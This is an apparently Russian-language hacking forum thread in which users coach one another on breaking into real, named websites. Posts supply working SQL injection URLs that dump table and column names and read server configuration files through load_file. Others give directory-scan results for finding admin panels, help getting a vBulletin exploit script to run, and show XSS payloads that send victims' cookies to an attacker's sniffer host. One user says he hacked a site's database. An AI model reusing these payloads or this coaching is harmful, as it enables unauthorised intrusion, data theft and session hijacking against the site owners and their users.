......... из Xspider//

как скачать с сайта php фаил в его настоящем виде?

roker777 said:
как скачать с сайта php фаил в его настоящем виде?


Залить шелл, получить доступ к фтп.

Redwood

А просто скачать никак? Если знаеш путь к нему и название.

roker777 said:
Redwood
А просто скачать никак? Если знаеш путь к нему и название.


Если речь идет о чужом сайте, то никак. PHP обрабатывается интерпретатором на сервере и отдает результат выполнения скрипта браузеру. Это язык с закрытым исходным кодом, в отличие от HTML или JS. Представь, есть у тебя сайт и есть скажем PHP файл с конфигом от БД, который доступен любому пользователю из веба, чтобы бы могло произойти в таком случае?

Redwood

Понятно.Спасибо!

roker777 said:
Redwood
А просто скачать никак? Если знаеш путь к нему и название.


Только если пхп падает, то файлы открываются в исходном виде..

roker777 said:
Redwood
А просто скачать никак? Если знаеш путь к нему и название.



мда... каникулы.. PHP скрипт обрабатывается на сервере и результат отдает браузеру в виде html кода, который он потом обрабатывает. Так что делай выводы - НЕЛЬЗЯ.

народ помогите со списком таблиц и колонок для джоб ресурсов или дайте линк если где нит есть, буду признателен.

http://podcasts.*****.com/get_mp3.mp3?f=/inc/global.php







вопрос: чем можно законектиться к бд? (если конечно конект разрешен)

Aels said:
вопрос: чем можно законектиться к бд? (если конечно конект разрешен)

Aels said:
вопрос: чем можно законектиться к бд? (если конечно конект разрешен)


Можешь воспользоваться скриптом Sypex Dumper.

http://sypex.net/ru/products/dumper/downloads/

Это если в дальнейшем планируется работа с БД.

помогите, как правильно сделать запрос ?

site.com/search/?search=1&search_words=j&search_section_id=25'&search_cond=1&search_numrows=10

DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326

Getty said:
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&search_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326


site.com/search/?search=1&search_words=j&search_section_id=25)+union+select+1+--+&search_cond=1&search_numrows=10

не могу найти число столбцов

http://www.site.com/index.php?poll=id&sort=DESC&results=15&page=7

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Domains\site.com\wwwroot\index.php on line 124

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in C:\Domains\site.com\wwwroot\includes\config.php on line 21

Warning: mysql_select_db() [function.mysql-select-db]: Access denied for user 'ODBC'@'127.0.0.1' (using password: NO) in C:\Domains\site.com\wwwroot\includes\config.php on line 32

Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in C:\Domains\site.com\wwwroot\includes\config.php on line 32

Где вы тут инъекцию видите?

Ins3t said:
Можешь воспользоваться скриптом Sypex Dumper.
http://sypex.net/ru/products/dumper/downloads/
Это если в дальнейшем планируется работа с БД.


navicat

не могу найти число столбцов

http://fastmapdownloads.com/index.php?order=id&sort=DESC&results=15&page=7

linuxkernal said:
не могу найти число столбцов
http://fastmapdownloads.com/index.php?order=id&sort=DESC&results=15&page=7


Читай пост выше. Тебе написали что инъекции нету. Там ошибка подключения к БД.

kfor said:
Там ошибка подключения к БД.


ошибка подключения к серверу MySQL - mysql_connect() error

ошибка в выборе БД -mysql_select_db () error

can we find user : password : host : database to connect through shell ?

Konqi said:
ошибка подключения к серверу MySQL -
mysql_connect() error
ошибка в выборе БД -
mysql_select_db () error



it is possible to find host : user : password : Database to connect through shell ?

kfor said:
Читай пост выше. Тебе написали что инъекции нету. Там ошибка подключения к БД.



it is possible to find host : user : password : Database to connect through shell ?

Konqi said:
ошибка подключения к серверу MySQL -
mysql_connect() error
ошибка в выборе БД -
mysql_select_db () error


Да немного я прокосил Но всё равно нету скули

i hacked one site and own its database but i can not find its http://forums.ubi.com/eve forums Registered Members: 1129865 users table

can anyone please solve this problem ?

http://validation.ubi.com/imagineportal/pmaPROD_WATCHOUT/db_details_structure.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=imagineportal&goto=db_details.php

Пытаюсь научится юзать эксплоиты, как понятно, совсем новичок

Интересует вот этот сплоит: http://forum.hackforce.ru/showpost.php?p=2241&postcount=1

Пишу в линуксовой консоли Perl путь-к-файлу-vbulletin.pl, вылезает вот такое:

Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /home/yaroslav/vbulletin.pl line 7.

BEGIN failed--compilation aborted at /home/yaroslav/vbulletin.pl line 7.

Подскажите, что надо поправить

Boa said:
Пытаюсь научится юзать эксплоиты, как понятно, совсем новичок
Интересует вот этот сплоит: http://forum.hackforce.ru/showpost.php?p=2241&postcount=1
Пишу в линуксовой консоли Perl путь-к-файлу-vbulletin.pl, вылезает вот такое:
Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at /home/yaroslav/vbulletin.pl line 7.
BEGIN failed--compilation aborted at /home/yaroslav/vbulletin.pl line 7.
Подскажите, что надо поправить


Надо найти модуль IO/SOCKET.pm и кинуть его в .../perl/lib/

вобщем есть запрос на выборку из таблы ibf_members

символ "_"(в имени таблицы) заменяется на "ampersand#95;"

и только в тех случаях, когда в строке(имя таблицы) есть "ibf_".

в остальных случаях "_" проходит.

Есть мысли? И как возможно это обойти?

Спасибо.

//пробовал с помощью подзапроса - не вышло

вот еще одна интересная и проблемная скуль:

http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+9--

судя по всему выполняется 2 sql запроса к базе:

http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+9--

http://www.voluptuousdating.com/aid/display.html?aid=1606+order+by+187--

есть мысли по раскрутке?

nemaniak said:
Надо найти модуль IO/SOCKET.pm и кинуть его в .../perl/lib/


Можно поподробнее, плиз?) И линк на это нечто, пожалуйста.

Boa said:
Можно поподробнее, плиз?) И линк на это нечто, пожалуйста.


вот модуль http://cpansearch.perl.org/src/GBARR/IO-1.2301/IO/Socket.pm, качаешь его, и ложишь в папку Путь_к_Перлу\lib\IO\

потом заново пытаешься заюзать сплойт

подробней уже некуда

nemaniak said:
вот модуль
http://cpansearch.perl.org/src/GBARR/IO-1.2301/IO/Socket.pm
, качаешь его, и ложишь в папку Путь_к_Перлу\lib\IO\
потом заново пытаешься заюзать сплойт
подробней уже некуда


А где перл обычно лежит? Убунта)

Boa said:
А где перл обычно лежит? Убунта)


тогда кидай модуль в один из этих путей в папку IO

/etc/perl

/usr/local/lib/perl/5.10.1

/usr/local/share/perl/5.10.1

/usr/lib/perl5

/usr/share/perl5

/usr/lib/perl/5.10

/usr/share/perl/5.10

Гм, в /etc/perl/IO положил Socket.pm, но ошибка все равно такая. Или надо класть во все каталоги?

Boa в терминале выполни:

sudo perl -MCPAN -e shell

install IO:Socket

почему этого сайта не показывай номер?

http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine

Я попытаться изменить --,/*, предела, name_const, но не результат?

haito said:
почему этого сайта не показывай номер?
http://www.nrhz.de/flyer/beitrag.php?id=-9999 and 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25--&service_menu=Termine
Я попытаться изменить --,/*, предела, name_const, но не результат?


http://www.nrhz.de/flyer/beitrag.php?id=15330+and+1=0+union+select+1,2,3,4, 5,6,7,8,9,aes_decrypt(aes_encrypt(version(),1),1), 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

Column 10

daniel_1024 гм, набрал, вот такие ужасы:


Code:
yaroslav@yaroslav-desktop:~$ sudo perl -MCPAN -e shell
Terminal does not support AddHistory.

cpan shell -- CPAN exploration and modules installation (v1.9402)
Enter 'h' for help.

cpan[1]> h

Display Information (ver 1.9402)
command argument description
a,b,d,m WORD or /REGEXP/ about authors, bundles, distributions, modules
i WORD or /REGEXP/ about any of the above
ls AUTHOR or GLOB about files in the author's directory
(with WORD being a module, bundle or author name or a distribution
name of the form AUTHOR/DISTRIBUTION)

Download, Test, Make, Install...
get download clean make clean
make make (implies get) look open subshell in dist directory
test make test (implies make) readme display these README files
install make install (implies test) perldoc display POD documentation

Upgrade
r WORDs or /REGEXP/ or NONE report updates for some/matching/all modules
upgrade WORDs or /REGEXP/ or NONE upgrade some/matching/all modules

Pragmas
force CMD try hard to do command fforce CMD try harder
notest CMD skip testing

Other
h,? display this menu ! perl-code eval a perl command
o conf [opt] set and query options q quit the cpan shell
reload cpan load CPAN.pm again reload index load newer indices
autobundle Snapshot recent latest CPAN uploads
cpan[2]> install IO:Socket
CPAN: Storable loaded ok (v2.20)
Going to read '/home/yaroslav/.cpan/Metadata'
Database was generated on Fri, 09 Jul 2010 06:27:12 GMT
Running install for module 'IO::Socket'
CPAN: Data::Dumper loaded ok (v2.124)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/home/yaroslav/.cpan/prefs'
Running make for G/GB/GBARR/IO-1.25.tar.gz
CPAN: Digest::SHA loaded ok (v5.47)
CPAN: Compress::Zlib loaded ok (v2.02)
Checksum for /home/yaroslav/.cpan/sources/authors/id/G/GB/GBARR/IO-1.25.tar.gz ok
Scanning cache /home/yaroslav/.cpan/build for sizes
.................................................. ..........................DONE
CPAN: Archive::Tar loaded ok (v1.52)
IO-1.25/
IO-1.25/ChangeLog
IO-1.25/IO.pm
IO-1.25/IO.xs
IO-1.25/lib/
IO-1.25/lib/IO/
IO-1.25/lib/IO/Dir.pm
IO-1.25/lib/IO/File.pm
IO-1.25/lib/IO/Handle.pm
IO-1.25/lib/IO/Pipe.pm
IO-1.25/lib/IO/Poll.pm
IO-1.25/lib/IO/Seekable.pm
IO-1.25/lib/IO/Select.pm
IO-1.25/lib/IO/Socket/
IO-1.25/lib/IO/Socket/INET.pm
IO-1.25/lib/IO/Socket/UNIX.pm
IO-1.25/lib/IO/Socket.pm
IO-1.25/Makefile.PL
IO-1.25/MANIFEST
IO-1.25/META.yml
IO-1.25/poll.c
IO-1.25/poll.h
IO-1.25/README
IO-1.25/SIGNATURE
IO-1.25/t/
IO-1.25/t/IO.t
IO-1.25/t/io_const.t
IO-1.25/t/io_dir.t
IO-1.25/t/io_dup.t
IO-1.25/t/io_file.t
IO-1.25/t/io_linenum.t
IO-1.25/t/io_multihomed.t
IO-1.25/t/io_pipe.t
IO-1.25/t/io_poll.t
IO-1.25/t/io_sel.t
IO-1.25/t/io_sock.t
IO-1.25/t/io_taint.t
IO-1.25/t/io_tell.t
IO-1.25/t/io_udp.t
IO-1.25/t/io_unix.t
IO-1.25/t/io_utf8.t
IO-1.25/t/io_xs.t
IO-1.25/t/test.pl
CPAN: File::Temp loaded ok (v0.22)

CPAN.pm: Going to build G/GB/GBARR/IO-1.25.tar.gz

Checking if your kit is complete...
Looks good
Writing Makefile for IO
Could not read '/home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/META.yml'. Falling back to other methods to determine prerequisites
cp lib/IO/Pipe.pm blib/lib/IO/Pipe.pm
cp lib/IO/File.pm blib/lib/IO/File.pm
cp lib/IO/Select.pm blib/lib/IO/Select.pm
cp lib/IO/Socket/INET.pm blib/lib/IO/Socket/INET.pm
cp lib/IO/Socket.pm blib/lib/IO/Socket.pm
cp lib/IO/Socket/UNIX.pm blib/lib/IO/Socket/UNIX.pm
cp lib/IO/Poll.pm blib/lib/IO/Poll.pm
cp lib/IO/Handle.pm blib/lib/IO/Handle.pm
cp lib/IO/Dir.pm blib/lib/IO/Dir.pm
cp lib/IO/Seekable.pm blib/lib/IO/Seekable.pm
cp IO.pm blib/lib/IO.pm
/usr/bin/perl /usr/share/perl/5.10/ExtUtils/xsubpp -typemap /usr/share/perl/5.10/ExtUtils/typemap IO.xs > IO.xsc && mv IO.xsc IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" IO.c
cc -c -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fno-strict-aliasing -pipe -fstack-protector -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2 -g -DVERSION=\"1.25\" -DXS_VERSION=\"1.25\" -fPIC "-I/usr/lib/perl/5.10/CORE" poll.c
Running Mkbootstrap for IO ()
chmod 644 IO.bs
rm -f blib/arch/auto/IO/IO.so
cc -shared -O2 -g -L/usr/local/lib -fstack-protector IO.o poll.o -o blib/arch/auto/IO/IO.so \
\

chmod 755 blib/arch/auto/IO/IO.so
cp IO.bs blib/arch/auto/IO/IO.bs
chmod 644 blib/arch/auto/IO/IO.bs
Manifying blib/man3/IO::Pipe.3pm
Manifying blib/man3/IO::File.3pm
Manifying blib/man3/IO::Select.3pm
Manifying blib/man3/IO::Socket::INET.3pm
Manifying blib/man3/IO::Socket.3pm
Manifying blib/man3/IO::Socket::UNIX.3pm
Manifying blib/man3/IO::Poll.3pm
Manifying blib/man3/IO::Handle.3pm
Manifying blib/man3/IO::Dir.3pm
Manifying blib/man3/IO::Seekable.3pm
Manifying blib/man3/IO.3pm
GBARR/IO-1.25.tar.gz
/usr/bin/make -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make test
PERL_DL_NONLAZY=1 /usr/bin/perl "-MExtUtils::Command::MM" "-e" "test_harness(0, 'blib/lib', 'blib/arch')" t/*.t
t/IO.t ............. ok
t/io_const.t ....... ok
t/io_dir.t ......... ok
t/io_dup.t ......... ok
t/io_file.t ........ ok
t/io_linenum.t ..... ok
t/io_multihomed.t .. ok
t/io_pipe.t ........ ok
t/io_poll.t ........ ok
t/io_sel.t ......... ok
t/io_sock.t ........ ok
t/io_taint.t ....... ok
t/io_tell.t ........ ok
t/io_udp.t ......... ok
t/io_unix.t ........ ok
t/io_utf8.t ........ ok
t/io_xs.t .......... ok
All tests successful.
Files=17, Tests=180, 22 wallclock secs ( 0.06 usr 0.02 sys + 0.40 cusr 0.09 csys = 0.57 CPU)
Result: PASS
GBARR/IO-1.25.tar.gz
/usr/bin/make test -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state
Running make install
Prepending /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/arch /home/yaroslav/.cpan/build/IO-1.25-BM9Gl0/blib/lib to PERL5LIB for 'install'
Files found in blib/arch: installing files in blib/lib into architecture dependent library tree
Installing /usr/local/lib/perl/5.10.1/auto/IO/IO.so
Appending installation info to /usr/local/lib/perl/5.10.1/perllocal.pod
GBARR/IO-1.25.tar.gz
/usr/bin/make install -- OK
Warning (usually harmless): 'YAML' not installed, will not store persistent state

cpan[3]>

Сплоит использовать по прежнему не получается(

Всем привет!

Обнаружилась на одном ресурсе уязвимость. Проведя SQL injection удалось с помощью функций MySQL user() и database() узнать, соответственно, имя пользователя и базы в СУБД:


Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,user(),3,4,5+--+



Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,database(),3,4,5+--+

Далее, используя переведенное в hex полученное имя БД, я предпринял попытку выудить имена таблиц запросом к INFORMATION_SCHEMA:


Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,table_name,3,4,5+from+information _schema.tables+where+table_schema=0x64363036313831 3039+--+

Ничто не предвещало сложностей, но результат я так и не получил. Любые запросы к базе с метаданными сопровождаются непонятной длительной загрузкой данных с сервера и успешной (код 200) выдачей пустой HTML-страницы.

Доступ к INFORMATION_SCHEMA есть - отработал запрос


Code:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GRANTEE,3,4,5+FROM+INFORMATION_SC HEMA.USER_PRIVILEGES+--+[/u]

и выдал мне идентификатор пользователя.

Пробовал указывать LIMIT 1 - результат тот же.

Кстати, хотел посмотреть COUNT(*) - то же самое.

Версия MySQL-сервера 5.0.77-log.

Кто сталкивался с подобным? Какие будут советы? Рекомендации?

Спасибо за любые подсказки!

Decoy

без линка вряд ли cмогут помочь тебя

Уязвимость на mobile.iyachtpod.com (https://antichat.live/showpost.php/p/2204313/postcount/12367/).

спаасибо за ответ.

помогите найти админку...http://www.nll.com/

помогите найти админку...http://www.nll.com/


Вот: http://www.nll.com/admin.inc. Но там 403.

З.Ы. Видел уже не один твой подобный пост. Скачай себе сканер директорий сайта и им же ищи админку.

jecka3000 said:
помогите найти админку...http://www.nll.com/


Попробуй выбрать из этого:


» http://www.nll.com/.htaccess HTTP 403 Forbidden
» http://www.nll.com/.htconfig HTTP 403 Forbidden
» http://www.nll.com/.htpasswd HTTP 403 Forbidden
» http://www.nll.com/header.php HTTP 200 OK
» http://www.nll.com/footer.php HTTP 200 OK
» http://www.nll.com/cgi-bin/ HTTP 403 Forbidden
» http://www.nll.com/cache/ HTTP 200 OK
» http://www.nll.com/chat/ HTTP 200 OK
» http://www.nll.com/logos/ HTTP 401 Authorization Required
» http://www.nll.com/stats/ HTTP 403 Forbidden
» http://www.nll.com/config.php.inc HTTP 403 Forbidden
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/uploads/ HTTP 200 OK
» http://www.nll.com/~root HTTP 403 Forbidden
» http://www.nll.com/admin.inc HTTP 403 Forbidden
» http://www.nll.com/community/ HTTP 200 OK
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/database.inc HTTP 403 Forbidden
» http://www.nll.com/db.inc HTTP 403 Forbidden
» http://www.nll.com/extension.inc HTTP 403 Forbidden
» http://www.nll.com/favicon.ico HTTP 200 OK
» http://www.nll.com/function.inc HTTP 403 Forbidden
» http://www.nll.com/horde/ HTTP 302 Found
» http://www.nll.com/icons/ HTTP 200 OK
» http://www.nll.com/index.php HTTP 200 OK
» http://www.nll.com/mobile/ HTTP 200 OK
» http://www.nll.com/users.inc HTTP 403 Forbidden
» http://www.nll.com/webmail/ HTTP 200 OK

Decoy

хм... пробуй такой запрос site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+

Далее из полученных таблиц выводи имена колонок:

site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+

получаешь имена колонок, и:

site.com/fail.php?id=-1+union+select

+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)

ЗЫ: +(пробел) перед коментариями не нужен) =) всего)

Добрый день!

С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.

Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?

http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--

haito said:
Добрый день!
С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.
Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?
http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--


Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.

$r00tkit$ said:
Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.


исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?

". '('.mysql_errno().') '.mysql_error().'

'. "Please check your settings in config.inc.php !

"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>

haito said:
исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?
". '('.mysql_errno().') '.mysql_error().'
'. "Please check your settings in config.inc.php !
"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>



Нажми Ctrl+U на клавиатуре и посмотри.

Press Ctrl+U on your keyboard and see

Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' ORDER BY emissions.sTitre' at line 1

попугай said:
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see


Благодарю вас, это работа

happygirl said:
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27


0_о не понял в чем проблема?

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+select+1,2,3,4,5,concat_ws%280x 3a,table_schema,table_name,column_name%29+from+inf ormation_schema.columns--+

Привет.

Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).

На сайтике есть один скриптик. Его вызов таков:

http://site/lol.php?p=name

этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).

Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).

Еще кое что есть.

Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.

Что можно сделать, дорогие эксперты?

Спасибо.

По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.

Либо задавай вопрос конкретнее, либо читай статьи.

Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (

http://www.noracom24.eu/image.php?w=200&h=120&id='

AKYLA said:
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='




Code:
http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_nam e%29+from+information_schema.tables+where+table_sc hema=database%28%29+--+

там в картинке выводится

Seravin

Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (

не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,

от этого одни минусы

1. вы не осваиваете sql инъекцию хорошо

2. вы доверяете программу которая может ошибиться

3. и этот взлом даже не можете считать вашим (это чистое мнение)

однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..

потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул

sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)

вообщем дело ваше, простите за оффтоп(если это оффтоп)

/showpost.php?p=2243635&postcount=14262

Актуально.

Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.

Konqi said:
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу
havij
которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)


когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать

Seravin said:
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать



Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.

Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками.

Сори за оффтоп

Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?

Не пинайте только)

/thread20140.html (https://antichat.live/threads/20140/) - это читал, но не нашел (или не понял) ответа((

Boa said:
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше?


Если на сайте с авторизацией, то сунуть админу, если нет - забить.


Boa said:
Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером?


Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/


Boa said:
Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html (https://antichat.live/threads/20140/)
- это читал, но не нашел (или не понял) ответа((


Почитай еще, там есть ответ на твой последний вопрос..


###Как его подставить к ссылке с Xss?
Да очень легко...
Есть несколко вариантов:
- 1)делаем вот так:
http://*****.ru/free?p='>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;
где **** сайт с Xss.
Вот сам составленый скрипт:
'>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
- 2)Можно ещё делать вот так:
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.

Если на сайте с авторизацией, то сунуть админу, если нет - забить.


Есть)


Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/


Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с


Code:
img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;

, и ссылку с


Code:
img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;

, т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.

2Boa

качай делюкс _ссылка самоуничтожится через 5 минут

+ надо немного подправить конф ($sniffer_path = "http://sniffer_path/")

+ там есть немного фака

имхо, но лучше так

http://*****.ru/free?p='>

где обращаетса к http://haknet.h16.ru/script/js.js

а в js.js есть:

img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;

этот способ более надёжен.

ПС

сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)

Code:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;

Что тут неправильно?( Путь в конфиге прописал.

Второй вариант трудоемок, а у меня два ночи) попробую потом.

Dare said:
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)


Привет!

